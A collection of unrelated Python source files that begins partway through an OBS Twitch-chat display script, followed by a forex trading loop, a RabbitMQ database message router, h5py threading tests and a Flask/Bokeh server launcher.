while (len(fixedData) < COLUMN_SIZE):
fixedData = fixedData + " "
array.append(fixedData)
def render_textSource(source):
textData = ""
for lineCounter in range(0, len(TEXTSOURCE_BUFFER)):
textData = textData + TEXTSOURCE_BUFFER[lineCounter]
if (lineCounter != (len(TEXTSOURCE_BUFFER) - 1)):
textData = textData + "\n"
settings = obs.obs_data_create()
obs.obs_data_set_string(settings, "text", textData)
obs.obs_source_update(source, settings)
obs.obs_data_release(settings)
# OBS Script Functions
def script_properties():
global CONNECTBUTTON_RESOURCE
props = obs.obs_properties_create()
sources = obs.obs_enum_sources()
CONNECTBUTTON_RESOURCE = obs.obs_properties_add_button(props, "btn_connect", "Connect", socket_connect)
source_list = obs.obs_properties_add_list(props, "TEXT_SOURCE", "Text source", obs.OBS_COMBO_TYPE_EDITABLE, obs.OBS_COMBO_FORMAT_STRING)
if sources is not None:
for source in sources:
source_id = obs.obs_source_get_unversioned_id(source)
if source_id == "text_gdiplus" or source_id == "text_ft2_source":
name = obs.obs_source_get_name(source)
obs.obs_property_list_add_string(source_list, name, name)
obs.source_list_release(sources)
COLUMN_RESOURCE = obs.obs_properties_add_int (props, "COLUMN_SIZE", "Column Size", 1, 100, 1)
LINE_RESOURCE = obs.obs_properties_add_int (props, "LINE_SIZE", "Line Size", 1, 100, 1)
USERNAME_RESOURCE = obs.obs_properties_add_text (props, "USERNAME_VALUE", "Username", obs.OBS_TEXT_DEFAULT)
CHANNEL_RESOURCE = obs.obs_properties_add_text (props, "CHANNEL_VALUE", "Channel", obs.OBS_TEXT_DEFAULT)
OAUTH_RESOURCE = obs.obs_properties_add_text (props, "OAUTH_VALUE", "OAUTH Key", obs.OBS_TEXT_PASSWORD)
return props
def script_update(settings):
global COLUMN_SIZE
global LINE_SIZE
global USERNAME_VALUE
global CHANNEL_VALUE
global OAUTH_KEY
global TEXTSOURCE_VALUE
COLUMN_SIZE = obs.obs_data_get_int (settings, "COLUMN_SIZE" )
LINE_SIZE = obs.obs_data_get_int (settings, "LINE_SIZE" )
USERNAME_VALUE = obs.obs_data_get_string (settings, "USERNAME_VALUE")
USERNAME_VALUE = USERNAME_VALUE.lower()
CHANNEL_VALUE = obs.obs_data_get_string (settings, "CHANNEL_VALUE")
CHANNEL_VALUE = CHANNEL_VALUE.lower()
OAUTH_KEY = obs.obs_data_get_string (settings, "OAUTH_VALUE" )
TEXTSOURCE_VALUE = obs.obs_data_get_string (settings, "TEXT_SOURCE" )
def script_unload():
global STOP_SIGNAL
STOP_SIGNAL = False
if SOCKET is not None:
SOCKET.shutdown(0)
SOCKET.close()
print("Chat script unloaded.")
|
trade.py
|
from multiprocessing import Queue, Process
from online_prediction import online_prediction
from robot import Robot
import torch
from util import IO, Norm, interest_margin
from datetime import datetime
import time
from momentum_robot import MRobot
from base_robot import TableRobot, ProbRobot
from decision_maker import DecisionMaker, DecisionWriter
def data_transform(data):
price = data[0]
diff = data[1]
acc = data[2]
feature = []
for p, d, a in zip(price, diff, acc):
if p is None:
exp = 100
conf = 100
elif d is None:
exp = 100
conf = a/p
elif a is None:
exp = d/p
conf = 100
else:
exp = d/p
conf = a/p
feature.append(exp)
feature.append(conf)
return feature
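# Illustrative example: data_transform(([1.2], [0.0012], [0.0003])) returns
# [0.001, 0.00025] -- each instrument contributes an (exp, conf) pair of
# diff/price and acc/price, with 100 used as a placeholder for missing values.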
def main():
################### define robot ################
# name = 'EURUSD'
"""
feature_bit = [6, 7, 8, 9, 10, 11, 12, 13]
n_features = len(feature_bit)
bob = Robot(name, input_dim=n_features)
bob.load(fn='6_13_600l')
"""
bob = ProbRobot('EURUSD')
################### init local param ############
# feature_con = torch.Tensor()
q = Queue()
p = Process(target=online_prediction, args=(q,))
p.start()
IO.clear_data('workspace/log/available.log')
# dmaker = DecisionMaker()
# prof_limit = 2*10**-4
# loss_limit = 10**-3
history = []
IO.write_request(['search index', 'open price'])
open_price = IO.get_response()['open price']
IO.close_response()
bob.set_opening_price(open_price)
DecisionWriter.clear_decision()
pre_decision = 'close'
cnt = 0
################ loops ##################
while True:
if q.empty():
time.sleep(0.1)
continue
origin, price = q.get()
if price is None:
time.sleep(0.1)
continue
# price_diff = origin[1]
history.append(price)
if len(history) > 1000:
history = history[-1000:]
cnt += 1
# print(cnt)
"""
feature = data_transform(origin)
feature = torch.Tensor(feature).reshape(1, 1, -1)
feature = Norm.abs_max_no_bias(feature)
feature = feature[:, :, feature_bit]
feature_con = torch.cat((feature_con, feature), dim=0)
feature_con = feature_con[-600:]
if len(feature_con) < 240:
continue
"""
if IO.load_prof_loss() > 0.000000000001:
continue
# diff_in_5_min = price_diff[5]
"""
if diff_in_5_min is None:
continue
"""
# decision = dmaker.from_rnn_feature(diff_in_5_min)
# print(decision)
"""
decision = bob.predict(feature_con)
decision = decision.reshape(-1).tolist()
decision = dmaker.max_out(decision)
print(decision)
"""
# dmaker.write_for_rnn_model(price, prof_limit, loss_limit)
bob.calc_avg_price(history, period=100)
res = bob.make_decision(price)
if res is not None:
decision, prof_lim, loss_lim = res
if decision == pre_decision:
DecisionWriter.clear_decision()
pre_decision = 'close'
else:
DecisionWriter.write_decision_with_limit(price, decision, prof_lim, loss_lim)
pre_decision = decision
time.sleep(3)
if __name__ == '__main__':
# load_prof()
main()
|
DataMessageRouter.py
|
from Messenger import Messenger
from db import Database as DB
from multiprocessing import Process
import json
class DataMessageRouter(object):
def __init__(self, host):
self._messenger = Messenger(host)
self._db = DB()
self._messenger.wait(self.post, 'post_data')
# self._messenger.wait(self.update, 'update_data')
self._messenger.wait(self.get, 'get_data')
# self._messenger.wait(self.delete, 'delete_data')
self._messenger.consume()
def post(self, channel, method, properties, body):
p = Process(target=self._post, args=(channel, method, properties, body))
p.start()
p.join()
def _post(self, channel, method, properties, body):
data = json.loads(body.decode("utf-8"))
self._db.insert(data['table'], **data['data'])
# process completed, send acknowledgment
channel.basic_ack(delivery_tag=method.delivery_tag)
message = json.dumps({"success": True})
self._messenger.respond(channel, properties, message)
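# Expected request shape (illustrative, inferred from the parsing above; the
# table and column names are placeholders):
#   {"table": "users", "data": {"name": "alice"}}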
#
# def update(self, channel, method, properties, body):
# p = Process(target=self._update, args=(self, channel, method, properties, body))
# p.start()
# p.join()
#
# def _update(self, channel, method, properties, body):
# data = json.loads(body)
# self._data_manager.update(body)
#
# # process completed, send acknowledgment
# channel.basic_ack(delivery_tag=method.delivery_tag)
def get(self, channel, method, properties, body):
p = Process(target=self._get, args=(channel, method, properties, body))
p.start()
p.join()
def _get(self, channel, method, properties, body):
data = json.loads(body.decode("utf-8"))
message = json.dumps(self._db.select(data['table'], *data['columns'], **data["where"]))
print(message)
self._messenger.respond(channel, properties, message)
# process completed, send acknowledgment
channel.basic_ack(delivery_tag=method.delivery_tag)
# def delete(self, channel, method, properties, body):
# p = Process(target=self._delete, args=(self, channel, method, properties, body))
# p.start()
# p.join()
#
# def _delete(self, channel, method, properties, body):
# data = json.loads(body.decode("utf-8"))
# self._data_manager.delete(data["data_id"])
# # process completed, send acknowledgment
# message = {
# "success": True,
# }
# message = json.dumps(message)
# self._messenger.respond(channel, properties, message)
# channel.basic_ack(delivery_tag=method.delivery_tag)
def main():
# todo create multiple threads
p = DataMessageRouter('rabbitmq')
if __name__ == '__main__':
main()
|
test_threads.py
|
# This file is part of h5py, a Python interface to the HDF5 library.
#
# http://www.h5py.org
#
# Copyright 2008-2013 Andrew Collette and contributors
#
# License: Standard 3-clause BSD; see "license.txt" for full license terms
# and contributor agreement.
"""
Tests that h5py error printing is squashed in non-main threads.
"""
from __future__ import absolute_import
import threading
import h5py
from ..common import ut, TestCase
class TestErrorPrinting(TestCase):
"""
Verify the error printing is squashed in all threads.
"""
def test_printing(self):
""" No console messages should be shown from membership tests """
# Unfortunately we can't have this test assert anything, as
# HDF5 writes directly to stderr. But it will show up in the
# console output.
import threading
def test():
with h5py.File(self.mktemp(), 'w') as newfile:
try:
doesnt_exist = newfile['doesnt_exist'].value
except KeyError:
pass
th = threading.Thread(target=test)
th.start()
th.join()
def test_attr_printing(self):
""" No console messages should be shown for non-existing attributes """
def test():
with h5py.File(self.mktemp(), 'w') as newfile:
newfile['newdata'] = [1,2,3]
try:
nonexistent_attr = newfile['newdata'].attrs['nonexistent_attr']
except KeyError:
pass
th = threading.Thread(target=test)
th.start()
th.join()
|
run.py
|
"""
Start Application Sequence:
1) bind sockets for flask to bokeh communications
2) start bokeh server (Tornado) running bokeh bkapp
3) start flask server (Tornado) running flask app
"""
import time
import logging
from threading import Thread
from app import start_tornado
from bkapp import (
bk_worker,
get_sockets
)
from config import (
BOKEH_URL,
FLASK_URL
)
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
# get sockets, so bkapp and app can talk
bk_sockets, bk_port = get_sockets()
# start bokeh sever
t1 = Thread(target=bk_worker, args=[bk_sockets, bk_port], daemon=True)
t1.start()
bokeh_url = BOKEH_URL.replace('$PORT', str(bk_port))
log.info("Bokeh Server App Running at: %s", bokeh_url)
# start flask server
t2 = Thread(target=start_tornado, daemon=True)
t2.start()
log.info("Flask + Bokeh Server App Running at: %s", FLASK_URL)
# loop for ever
while True:
time.sleep(0.05)
|